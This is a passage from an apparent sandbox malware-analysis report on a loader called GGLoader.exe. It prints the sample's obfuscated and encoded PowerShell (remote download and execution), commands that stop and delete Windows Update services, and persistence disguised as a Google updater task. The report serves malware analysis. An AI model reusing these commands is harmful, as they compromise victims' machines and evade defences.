'+'y'+'s'+''+'i'+''+[char](103)+''+','+'p'+[char](117)+''+'b'+'l'+'i'+''+[char](99)+'',[reflection.callingconventions]::standard,$qtvyipwnfcficq).setimplementationflags(''+[char](82)+''+[char](117)+'nt'+[char](105)+'m'+[char](101)+''+[char](44)+''+[char](77)+''+'a'+'n'+[char](97)+''+[char](103)+'e'+[char](100)+'');$dpttuehyisd.definemethod('i'+[char](110)+''+[char](118)+''+'o'+''+[char](107)+''+'e'+'',''+[char](80)+''+[char](117)+''+[char](98)+'l'+'i'+''+'c'+''+[char](44)+''+[char](72)+''+[char](105)+''+[char](100)+'e'+[char](66)+'y'+'s'+''+[char](105)+'g'+[char](44)+'n'+'e'+'w'+[char](83)+''+[char](108)+''+[char](111)+''+'t'+''+[char](44)+''+[char](86)+''+[char](105)+''+'r'+''+[char](116)+''+'u'+''+[char](97)+''+'l'+'',$hhlnovedyw,$qtvyipwnfcficq).setimplementationflags('r'+[char](117)+''+[char](110)+''+[char](116)+''+[char](105)+''+[char](109)+''+[char](101)+''+','+''+[char](77)+''+'a'+''+'n'+''+'a'+''+[char](103)+''+[char](101)+''+'d'+'');write-output $dpttuehyisd.createtype();}$fxvcjurjeeuct=([appdomain]::currentdomain.getassemblies()|where-object{$_.globalassemblycache -and $_.location.split('\')[-1].equals(''+'s'+''+[char](121)+''+[char](115)+''+'t'+''+[char](101)+'m'+'.'+''+[char](100)+''+[char](108)+''+'l'+'')}).gettype('m'+'i'+''+[char](99)+''+[char](114)+''+[char](111)+''+'s'+'o'+'f'+'t'+'.'+''+'w'+''+[char](105)+''+'n'+''+[char](51)+''+'2'+''+[char](46)+''+'u'+'n'+[char](115)+''+[char](97)+''+[char](102)+''+[char](101)+'f'+'x'+''+[char](118)+'c'+[char](106)+''+'u'+''+[char](
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe "function local:qgcytqphzuyk{param([outputtype([type])][parameter(position=0)][type[]]$mpiggxnlyyxmmn,[parameter(position=1)][type]$ykftymbqtb)$nmulmondbgm=[appdomain]::currentdomain.definedynamicassembly((new-object reflection.assemblyname(''+[char](82)+''+[char](101)+'f'+'l'+'e'+'c'+''+'t'+'e'+[char](100)+'d'+[char](101)+''+[char](108)+'e'+'g'+''+[char](97)+''+[char](116)+''+[char](101)+'')),[reflection.emit.assemblybuilderaccess]::run).definedynamicmodule('i'+[char](110)+''+[char](77)+''+[char](101)+''+'m'+'or'+[char](121)+''+[char](77)+''+[char](111)+''+'d'+'u'+[char](108)+''+'e'+'',$false).definetype(''+[char](77)+''+'y'+''+[char](68)+''+[char](101)+'le'+[char](103)+''+[char](97)+''+'t'+''+[char](101)+''+[char](84)+''+'y'+'p'+[char](101)+'',''+[char](67)+''+'l'+''+[char](97)+''+[char](115)+'s'+[char](44)+''+[char](80)+''+[char](117)+''+[char](98)+'li'+'c'+''+','+'s'+[char](101)+''+'a'+''+[char](108)+'ed,a'+[char](110)+'s'+[char](105)+''+[char](67)+''+[char](108)+''+'a'+''+[char](115)+'s'+[char](44)+''+[char](65)+''+'u'+''+[char](116)+''+[char](111)+''+[char](67)+''+'l'+''+'a'+''+[char](115)+''+[char](115)+'',[multicastdelegate]);$nmulmondbgm.defineconstructor(''+[char](82)+'t'+[char](83)+''+'p'+''+[char](101)+''+'c'+''+[char](105)+''+'a'+''+'l'+''+[char](78)+''+[char](97)+'me'+[char](44)+''+[char](72)+''+'i'+''+[char](100)+''+'e'+''+[char](66)+''+[char](121)+'si'+[char](103)+''+','+''+[char](80)+''+[char](117)+''+'b'+''+[char](108)+'i'+[char](99)+'',[reflection.callingconventions]::standard,$mpiggxnlyyxmmn).setimplementationflags(''+'r'+'u'+[char](110)+'t'+[char](105)+''+[char](109)+''+[char](101)+''+[char](44)+''+'m'+''+[char](97)+'n'+[char](97)+''+'g'+''+'e'+''+[char](100)+'');$nmulmondbgm.definemethod(''+[char](73)+''+[char](110)+''+[char](118)+''+[char](111)+''+'k'+''+[char](101)+'',''+[char](80)+''+[char](117)+'b'+[char](108)+'i'+[char](99)+','+[char](72)+''+'i'+''+[char](100)+''+[char](101)+''+[char](66)+'y'+[char](83)+'ig'+[char](44)+''+[char](78)+''+[char](101)+''+[char](119)+'s'+[char](108)+'ot'+[char](44)+'v'+[char](105)+'r'+'t'+'u'+[char](97)+''+[char](108)+'',$ykftymbqtb,$mpiggxnlyyxmmn).setimplementationflags(''+[char](82)+''+[char](117)+''+[char](110)+''+'t'+''+[char](105)+''+[char](109)+''+[char](101)+''+[char](44)+'m'+'a'+''+[char](110)+''+'a'+''+'g'+''+[char](101)+'d');write-output $nmulmondbgm.createtype();}$mrsnzvuswjbnm=([appdomain]::currentdomain.getassemblies()|where-object{$_.globalassemblycache -and $_.location.split('\')[-1].equals(''+[char](83)+''+[char](121)+''+[char](115)+''+[char](116)+''+[char](101)+''+[char](109)+'.d'+[char](108)+'l')}).gettype('mi'+[char](99)+''+'r'+''+[char](111)+''+[char](115)+''+[char](111)+''+'f'+''+[char](116)+''+'.'+''+'w'+''+'i'+''+'n'+'3'+[char](50)+'.'+'u'+''+[char](110)+''+[char](115)+''+[char](97)+''+[char](102)+'emr'+[char](115)+''+[char](78)+''+[char](90)+''+'v'+''+[
Source: C:\Users\user\Desktop\GGLoader.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -encodedcommand "paajagcacgb4acmapgbtahqayqbyahqalqbqahiabwbjaguacwbzacaacabvahcazqbyahmaaablagwabaagac0avwbpag4azabvahcauwb0ahkabablacaasabpagqazablag4aiaataeeacgbnahuabqblag4adabmagkacwb0acaaigbbagqazaatafqaeqbwaguaiaataeeacwbzaguabqbiagwaeqboageabqblacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsapaajag4adqbzacmapgbbafmaeqbzahqazqbtac4avwbpag4azabvahcacwauaeyabwbyag0acwauae0azqbzahmayqbnaguaqgbvahgaxqa6adoauwboag8adwaoaccatgbvacaavgbpahiadab1ageabaagae0ayqbjaggaaqbuagualwbtaguacgb2aguacgagagkacwagageababsag8adwblagqaiqagafqacgb5acaacgb1ag4abgbpag4azwagag8abgagageaiabkagkazgbmaguacgblag4adaagagqazqb2agkaywblaceajwasaccajwasaccatwblaccalaanaeuacgbyag8acganackapaajahcaawbracmapga7aciaowa8acmazqbmahiaiwa+acaaqqbkagqalqbnahaauabyaguazgblahiazqbuagmazqagadwaiwbmahaazwajad4aiaataeuaeabjagwadqbzagkabwbuafaayqb0aggaiabaacgajablag4adga6afuacwblahiauabyag8azgbpagwazqasacqazqbuahyaogbtahkacwb0aguabqbeahiaaqb2aguakqagadwaiwbuahoaaaajad4aiaataeyabwbyagmazqagadwaiwbhaheazaajad4aowaoae4azqb3ac0atwbiagoazqbjahqaiabtahkacwb0aguabqauae4azqb0ac4avwblagiaqwbsagkazqbuahqakqauaeqabwb3ag4ababvageazabgagkabablacgajwboahqadabwahmaogavac8aygbpahqaygb1agmaawblahqalgbvahiazwavaduaoqa0adaaagbnadkaoaazadqalwbnagyamwa0adqamwbmadmalwbyageadwavadaayqbkagyayqblagyanabmadganaa3ageamqa3aguayqa0aguanabmadyanqa2agqaywbkadganqbladcangayadkamwa3adgamablagqalwbeac4azqb4aguajwasacaapaajahaaagb4acmapgagacgasgbvagkabgatafaayqb0aggaiaa8acmadgbjahkaiwa+acaalqbqageadaboacaajablag4adga6afqazqbtahaaiaa8acmaeqbjahkaiwa+acaalqbdaggaaqbsagqauabhahqaaaagaccatabpagmazqbuahmazqbhaguadaauaguaeablaccakqapadwaiwbiagcaawajad4aowagacgatgblahcalqbpagiaagblagmadaagafmaeqbzahqazqbtac4atgblahqalgbxaguaygbdagwaaqblag4adaapac4arabvahcabgbsag8ayqbkaeyaaqbsaguakaanaggadab0ahaacwa6ac8alwbiagkadabiahuaywbraguadaauag8acgbnac8acgblagmaaablageadabzag8acgbnac8acgblagmaaablageadabzagqaaqbyaguaywb0ac8acgbhahcalwawadaazqbiadiazaawagianaazadyanqa5adeazgbjaguamqaxaduamwbiageaywbhadcangayaduamaa5aguanwa2adiazgayagmazqa0ac8aqwbmafaalgblahgazqanacwaiaa8acmacwbiagqaiwa+acaakabkag8aaqbuac0auabhahqaaaagadwaiwboaheadqajad4aiaatafaayqb0aggaiaakaguabgb2adoavablag0acaagadwaiwbrahcacwajad4aiaataemaaabpagwazabqageadaboacaajwbmagkaywbdaggazqbjagsalgblahgazqanackakqa8acmaawbpahgaiwa+adsaiaaoae4azqb3ac0atwbiagoazqbjahqaiabtahkacwb0aguabqauae4azqb0ac4avwblagiaqwbsagkazqbuahqakqauaeqabwb3ag4ababvageazabgagkabablacgajwboahqadabwahmaogavac8aygbpahqaygb1agmaawblahqalgbvahiazwavahiazqbjaggazqbhahqacwbvahiazwavahiazqbjaggazqbhahqacwbkagkacgblagmadaavahiayqb3ac8amaawaguaygayagqamabiadqamwa2aduaoqaxagyaywbladeamqa1admaygbhagmayqa3adyamga1adaaoqbladcangayagyamgbjaguanaavaeqazqb2ag0aaqbuac4azqb4aguajwasacaapaajagqadqbxacmapgagacgasgbvagkabgatafaayqb0aggaiaa8acmaaaboahqaiwa+acaalqbqageadaboacaajablag4adga6afqazqbtahaaiaa8acmadqbzahiaiwa+acaalqbdaggaaqbsagqauabhahqaaaagaccatabpagmauwblag4azaauaguaeablaccakqapadwaiwboahcab Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" add-type -assemblyname system.windows.forms;<#nus#>[system.windows.forms.messagebox]::show('no virtual machine/server is allowed! try running on a different device!','','ok','error')<#wkk#>; Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LicSend.exe Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c sc stop usosvc & sc stop waasmedicsvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "hklm\system\currentcontrolset\services\usosvc" /f & reg delete "hklm\system\currentcontrolset\services\waasmedicsvc" /f & reg delete "hklm\system\currentcontrolset\services\wuauserv" /f & reg delete "hklm\system\currentcontrolset\services\bits" /f & reg delete "hklm\system\currentcontrolset\services\dosvc" /f Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LicSend.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe <#ncotqmia#> if((new-object security.principal.windowsprincipal([security.principal.windowsidentity]::getcurrent())).isinrole([security.principal.windowsbuiltinrole]::administrator)) { if([system.environment]::osversion.version -lt [system.version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'system' /tn 'googleupdatetaskmachineqc' /tr '''c:\program files\google\chrome\updater.exe''' } else { register-scheduledtask -action (new-scheduledtaskaction -execute 'c:\program files\google\chrome\updater.exe') -trigger (new-scheduledtasktrigger -atstartup) -settings (new-scheduledtasksettingsset -allowstartifonbatteries -disallowhardterminate -dontstopifgoingonbatteries -dontstoponidleend -executiontimelimit (new-timespan -days 1000)) -taskname 'googleupdatetaskmachineqc' -user 'system' -runlevel 'highest' -force; } } else { reg add "hkcu\software\microsoft\windows\currentversion\run" /v "googleupdatetaskmachineqc" /t reg_sz /f /d 'c:\program files\google\chrome\updater.exe' } Jump to behavior
Source: C:\Windows\System32\dllhost.exe Code function: 42_2_0000000140001C64 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW, 42_2_0000000140001C64
Source: C:\Windows\System32\dllhost.exe Code function: 42_2_0000000140001C64 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW, 42_2_0000000140001C64
Source: dwm.exe, 0000002E.00000002.2994797055.000002BAA7B6D000.00000004.00000020.00020000.00000000.sdmp, dwm.exe, 0000002E.00000000.2235418179.000002BAA7B6D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Manager
Source: winlogon.exe, 0000002B.00000000.2219013843.00000225DCB71000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 0000002B.00000002.2969652088.00000225DCB70000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 0000002E.00000000.2236251350.000002BAA8051000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
Source: winlogon.exe, 0000002B.00000000.2219013843.00000225DCB71000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 0000002B.00000002.2969652088.00000225DCB70000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 0000002E.00000000.2236251350.000002BAA8051000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
Source: winlogon.exe, 0000002B.00000000.2219013843.00000225DCB71000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 0000002B.00000002.2969652088.00000225DCB70000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 0000002E.00000000.2236251350.000002BAA8051000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
Source: winlogon.exe, 0000002B.00000000.2219013843.00000225DCB71000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 0000002B.00000002.2969652088.00000225DCB70000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 0000002E.00000000.2236251350.000002BAA8051000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: }Program Manager
Contains functionality to query CPU information (cpuid)
Source: C:\Users\user\AppData\Local\Temp\LicCheck.exe Code function: 6_2_007A5815 cpuid 6_2_007A5815
Contains functionality to query locales information (e.g. system language)
Source: C:\Users\user\AppData\Local\Temp\LicCheck.exe Code function: EnumSystemLocalesW, 6_2_007BD13B
Source: C:\Users\user\AppData\Local\Temp\LicCheck.exe Code function: GetLocaleInfoW, 6_2_007B51E1
Source: C:\Users\user\AppData\Local\Temp\LicCheck.exe Code function: EnumSystemLocalesW, 6_2_007BD186
Source: C:\Users\user\AppData\Local\Temp\LicCheck.exe Code function: EnumSystemLocalesW, 6_2_007BD221
Source: C:\Users\user\AppData\Local\Temp\LicCheck.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW, 6_2_007BD2AC
Source: C:\Users\user\AppData\Local\Temp\LicCheck.exe Code function: GetLocaleInfoW, 6_2_007BD4FF
Source: C:\Users\user\AppData\Local\Temp\LicCheck.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 6_2_007BD628
Source: C:\Users\user\AppData\Local\Temp\LicCheck.exe Code function: GetLocaleInfoW, 6_2_007BD72E
Source: C:\Users\user\AppData\Local\Temp\LicCheck.exe Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 6_2_007BD7FD
Source: C:\Users\user\AppData\Local\Temp\LicCheck.exe Code function: EnumSystemLocalesW, 6_2_007B4CBB
Source: C:\Users\user\AppData\Local\Temp\LicCheck.exe Code function: GetACP,IsValidCodePage,GetLocaleInfoW, 6_2_007BCE99
Source: C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exe Code function: GetLocaleInfoW, 35_2_00C051E1
Source: C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exe Code function: EnumSystemLocalesW, 35_2_00C0D186
Source: C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exe Code function: EnumSystemLocalesW, 35_2_00C0D13B
Source: C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW, 35_2_00C0D2AC
Source: C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exe Code function: EnumSystemLocalesW, 35_2_00C0D221
Source: C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exe Code function: GetLocaleInfoW, 35_2_00C0D4FF
Source: C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 35_2_00C0D628
Source: C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exe Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 35_2_00C0D7FD
Source: C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exe Code function: GetLocaleInfoW, 35_2_00C0D72E
Source: C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exe Code function: EnumSystemLocalesW, 35_2_00C04CBB
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\GGLoader.exe Queries volume information: C:\Users\user\Desktop\GGLoader.exe VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
